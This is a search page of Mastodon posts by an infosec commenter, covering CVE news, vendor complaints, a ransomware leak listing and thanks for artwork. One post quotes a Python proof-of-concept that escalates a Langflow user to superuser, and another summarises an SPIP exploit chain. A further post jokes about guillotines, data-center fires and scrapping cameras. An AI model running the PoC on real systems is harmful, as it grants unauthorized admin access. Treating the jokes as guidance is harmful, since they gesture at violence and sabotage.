home.social

Search

17 results for “cr0w”

  1. RE: infosec.exchange/@cR0w/1173941

    You’re more than welcome! It was incredibly rewarding to share a “thank you for being you” painting created by @cyborg_writer an artist I met through Mastodon! Seems only fitting! Enjoy!! :)

  2. lol. lmao even.

    arstechnica.com/security/2026/

    The attackers launched a series of attacks on the .gh, .sl, and .as country code top-level domains (ccTLDs) and then modified authoritative DNS records for selected domains within those namespaces. By controlling those DNS records, the attackers were able to pass automated domain control validation checks and obtain unauthorized certificates for “several Google domains” and “several leading global brands and widely used online services.” Google said it updated Chrome to block all certificates it identified as unauthorized, and worked with the issuing certification authorities to ensure the unauthorized certificates for Google properties were revoked.

    H/T @iaintshootinmis

  3. Someone needs to check on the USMC.

    nvd.nist.gov/vuln/detail/cve-2

    The Crayons plugin for SPIP before 3.5.0 contains a missing authorization vulnerability that allows unauthenticated attackers to modify arbitrary editable object fields by omitting the secu_ anti-forgery parameter in crayons_store.php, causing the authorization dispatcher to resolve an unconditionally-true handler instead of the proper modification check. Attackers can chain this flaw to write a malicious .html skeleton file, disclose sensitive configuration files containing the site secret, and forge a signed ajax context to execute the uploaded skeleton, achieving arbitrary PHP code execution as the web-server user.

  4. You can always tell when vendors like Palo Alto are getting ready to announce a new product because they start making their existing shit even worse so they can say "that's fixed with this new product."

  5. What's with all these TLS libs fucking up cert validation lately?

    github.com/microsoft/msquic/se

  6. The state of critical infrastructure cybersecurity would be a lot better if vendors like Palo Alto would enable their customers, who already pay a lot of money for the services, to actually take action on threats instead of relying on the "trust me bro" and AI bullshit.

    paloaltonetworks.com/blog/netw

    Palo Alto Networks is deeply committed to protecting the critical infrastructure society depends on, continually investing in the security capabilities operators need for what comes next.

    LOL. LMAO even. 🖕

  7. RE: infosec.exchange/@krypt3ia/117

    :neofox_drake_dislike: ASMR in the background

    :neofox_drake_like: The Buzzer in the background

  8. Go hack more Langflow shit. That PoC... 🤣

    github.com/langflow-ai/langflo

    import asyncio
    from sqlmodel import select
    from langflow.services.database.models.user.model import User
    from langflow.services.deps import session_scope

    async def escalate():
    async with session_scope() as session:
    stmt = select(User).where(User.username == 'testuser')
    user = (await session.exec(stmt)).first()
    if user:
    user.is_superuser = True
    session.add(user)
    await session.commit()

    asyncio.run(escalate())
  9. Y'all, look what @cyborg_writer made. :brdHappy:

    Huge thanks to @jtrentadams for commissioning it. :heart_cyber:

  10. RE: w3c.social/@w3c/11739355552100

    SVG2 still allows embedded scripts. It's getting added to the same block lists as SVG files.

  11. RE: infosec.exchange/@taylorparizo

    Anyone know if this ( or similar ) is at all related to all the STUN RDDoS the last few days?

  12. Flydubai listed by Everest.

    Total files: 16,517.

    Total stored size: 4.36 GB.

    Operational documents, software and content resources: 6,424 files.

    AppleDouble technical metadata: 10,093 files; 39.43 MB.

  13. RE: flipboard.com/@pbsnewshour/edu

    I'll save you a click. Here are the tips:

    • High carbon steel takes to a good edge for your guillotine.

    • Magnesium fires suck in data centers.

    • Axon cameras have even more scrappable metal inside than Flock cameras.

  14. Y'all might want to patch your GeoServer if you haven't already. And maybe do some hunting.

    geoserver.org/vulnerability/20

Share on Mastodon

Enter the server where you have an account.